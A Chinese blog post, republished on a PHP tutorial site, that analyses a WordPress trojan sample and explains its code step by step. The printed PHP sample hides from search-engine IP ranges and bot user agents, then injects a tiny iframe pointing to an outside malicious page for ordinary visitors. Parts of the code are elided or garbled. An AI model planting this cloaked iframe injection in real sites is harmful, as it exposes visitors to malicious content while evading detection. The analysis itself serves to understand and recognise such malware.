简体中文(ZH-CN) English(EN) 繁体中文(ZH-TW) 日本語(JA) 한국어(KO) Melayu(MS) Français(FR) Deutsch(DE)
首页 > php教程 > php手册 > 正文

一个 Wordpress 木马样本分析

WBOY
发布: 2016-06-06 20:14:11
原创
1051 人浏览过

在饭否看到zuola说得到一个wordpress木马脚本,于是就点了连接,并简单的看了看这个样本。原理比较简单,先判断访问来源是否是搜索引擎的蜘蛛或bot,再确定是否显示一个有问题iframe——木马的效力也取决于这个iframe中的内容。这一小段PHP脚本也完全可以用

在饭否看到zuola说得到一个wordpress木马脚本,于是就点了连接,并简单的看了看这个样本。原理比较简单,先判断访问来源是否是搜索引擎的蜘蛛或bot,再确定是否显示一个有问题iframe——木马的效力也取决于这个iframe中的内容。这一小段PHP脚本也完全可以用到其它任何PHP程序中。

将源代码做了个简单的整理如下:

<p class="line">1</p><p class="line">2</p><p class="line">3</p><p class="line">4</p><p class="line">5</p><p class="line">6</p><p class="line">7</p><p class="line">8</p><p class="line">9</p><p class="line">10</p><p class="line">11</p><p class="line">12</p><p class="line">13</p><p class="line">14</p><p class="line">15</p><p class="line">16</p><p class="line">17</p><p class="line">18</p><p class="line">19</p><p class="line">20</p><p class="line">21</p><p class="line">22</p><p class="line">23</p><p class="line">24</p><p class="line">25</p><p class="line">26</p><p class="line">27</p><p class="line">28</p><p class="line">29</p><p class="line">30</p><p class="line">31</p><p class="line">32</p><p class="line">33</p>
登录后复制
 
<p class="line">error_reporting(0);</p><p class="line">$bot = FALSE ;</p><p class="line">$user_agent_to_filter = array('bot','spider','spyder'... ...'mybloglog api');</p><p class="line">$stop_ips_masks = array(</p><p class="line">array("216.239.32.0","216.239.63.255"),</p><p class="line">array("64.68.80.0"  ,"64.68.87.255"  ),</p><p class="line">... ... ...</p><p class="line">... ... ...</p><p class="line">array("72.30.0.0","72.30.255.255"),</p><p class="line">array("38.0.0.0","38.255.255.255")</p><p class="line">);</p><p class="line">$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));</p><p class="line">foreach ( $stop_ips_masks as $IPs ) {</p><p class="line">    $first_d=sprintf("%u",ip2long($IPs[0]));</p><p class="line">    $second_d=sprintf("%u",ip2long($IPs[1]));</p><p class="line">    if ($my_ip2long >= $first_d && $my_ip2long </p><p class="line">        $bot = TRUE;</p><p class="line">        break;</p><p class="line">    }</p><p class="line">}</p><p class="line">foreach ($user_agent_to_filter as $bot_sign){</p><p class="line">    if(strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){</p><p class="line">        $bot = true;</p><p class="line">        break;</p><p class="line">    }</p><p class="line">}</p><p class="line">if (!$bot) {</p><p class="line">    echo '<iframe src="http://chensd.com/2011-09/" http: width="3" height="3"></iframe>&gt"'</p><p class="line">}</p>
登录后复制

1、环境配置与变量声明

error_reporting(0)是为了保证在任何情况下都不报错。

$bot是声音了一个flag,默认值为false,从后面的情况来看,这个是用来表明当前访问者是否是真正的浏览用户。

$user_agent_to_filter和$stop_ips_masks,前者是一维数据,存储了一大堆需要排除的浏览器user_agent,后者是个二维数据,存储了若干个ip段,这些ip段经查询,大都是搜索引擎的。

2、访问者ip的判断

接下来,是通过ip地址和浏览器user agent来进行用户是否是普通浏览器的判断。

<p class="line">1</p><p class="line">2</p><p class="line">3</p><p class="line">4</p><p class="line">5</p><p class="line">6</p><p class="line">7</p><p class="line">8</p><p class="line">9</p><p class="line">10</p>
登录后复制
 
<p class="line">$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));</p><p class="line">foreach ( $stop_ips_masks as $IPs ) {</p><p class="line">    $first_d=sprintf("%u",ip2long($IPs[0]));</p><p class="line">    $second_d=sprintf("%u",ip2long($IPs[1]));</p><p class="line">    if ($my_ip2long >= $first_d && $my_ip2long </p><p class="line">        $bot = TRUE;</p><p class="line">        break;</p><p class="line">    }</p><p class="line">}</p>
登录后复制

ip2long这个函数可以将ip地址转换成一个整数,sprintf(‘%u’, xxx)将这个int转换成无符号数。

foreach在$stop_ips_masks中进行循环,取二维数据中的每一个数组,$frist_d和$second_d分别存储ip段起点ip和止点ip的无符号整数值,再用接下来的if进行判断,当前访问者ip是否在$stop_ips_masks所指定的范围内,若是,则将$bot量置为true。

3、访问者user agent的判断

<p class="line">1</p><p class="line">2</p><p class="line">3</p><p class="line">4</p><p class="line">5</p><p class="line">6</p>
登录后复制
 
<p class="line">foreach ($user_agent_to_filter as $bot_sign){</p><p class="line">    if(strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){</p><p class="line">        $bot = true;</p><p class="line">        break;</p><p class="line">    }</p><p class="line">}</p>
登录后复制

这一部分的判断与ip判断类似,从$user_agent_to_filter中读取每一个值,再与浏览者的user agent进行对比,如果发现是机器人或者蜘蛛,则将$bot置为true。

4、放置iframe

if(!$bot)控制当访问者是普通浏览器时,即放置这个iframe,iframe的scr是无耻者放置乱七八糟内容的网页——chrome已经将它block了。

5、结论

这个脚本可以用在任何php写成的网站中。而且,这段代码其实可以隐藏得更好,而不是这样连裤衩都不穿的裸奔。

在饭否看到zuola说得到一个wordpress木马脚本,于是就点了连接,并简单的看了看这个样本。原理比较简单,先判断访问来源是否是搜索引擎的蜘蛛或bot,再确定是否显示一个有问题iframe——木马的效力也取决于这个iframe中的内容。这一小段PHP脚本也完全可以用到其它任何PHP程序中。

将源代码做了个简单的整理如下:

原文地址:一个 Wordpress 木马样本分析, 感谢原作者分享。

相关标签:
wordpress 分析 样本
来源:php.cn
上一篇:YAC Object Cache For WordPress 下一篇:php 保留两位小数
本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
作者最新文章
最新问题
如何在 PHP 中使用 while 循环按 ID 列出节中的数据? 我有一个包含这些列的mysql表:series_id,series_color,product_name在输出中,我想按部分列出数据,每个series_id一个部分,如下所示:A1...
来自于 2023-11-17 20:03:03
0
1
290
在访问路线之前预加载路线数据的最佳方法。 在为给定路由渲染页面之前,我想首先同步获取必要的数据。理想情况下,我希望在页面组件中获取数据,但我不反对在路由器文件中执行此操作。我已经阅读并尝试了各种方法,但部分挑战来自于这样一...
来自于 2023-11-17 14:54:42
0
2
379
Vue项目中未定义模块 我刚刚通过运行npmini tvue@latest创建了一个新的Vue应用程序,如官方文档中指定的那样。然后我尝试按照Vue和Vite网站上的指南将Tailwind添加到我的应用程...
来自于 2023-11-17 12:38:53
0
2
394
新标题:新脚本无法正确显示存储数据的奇怪字符编码 我正在尝试重写一个旧网站。它是波斯语,使用波斯/阿拉伯字符。CREATEDATABASE`db`DEFAULTCHARACTERSETutf8COLLATEutf8_persian...
来自于 2023-11-17 10:51:01
0
2
273
更改时如何将键作为 v-for 的选择选项值传递(VueJS) 我正在使用Vue3和Bootstrap5。我有一个select有多个选项。现在我正在显示我的option.TEXT,当我更改某些内容时,这个value也将被传递到我的方法中。但当我...
来自于 2023-11-17 08:55:24
0
1
276
相关专题
更多>
热门推荐
热门教程
更多>
相关教程
热门推荐
最新课程
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责声明 Sitemap
PHP中文网:公益在线PHP培训,帮助PHP学习者快速成长!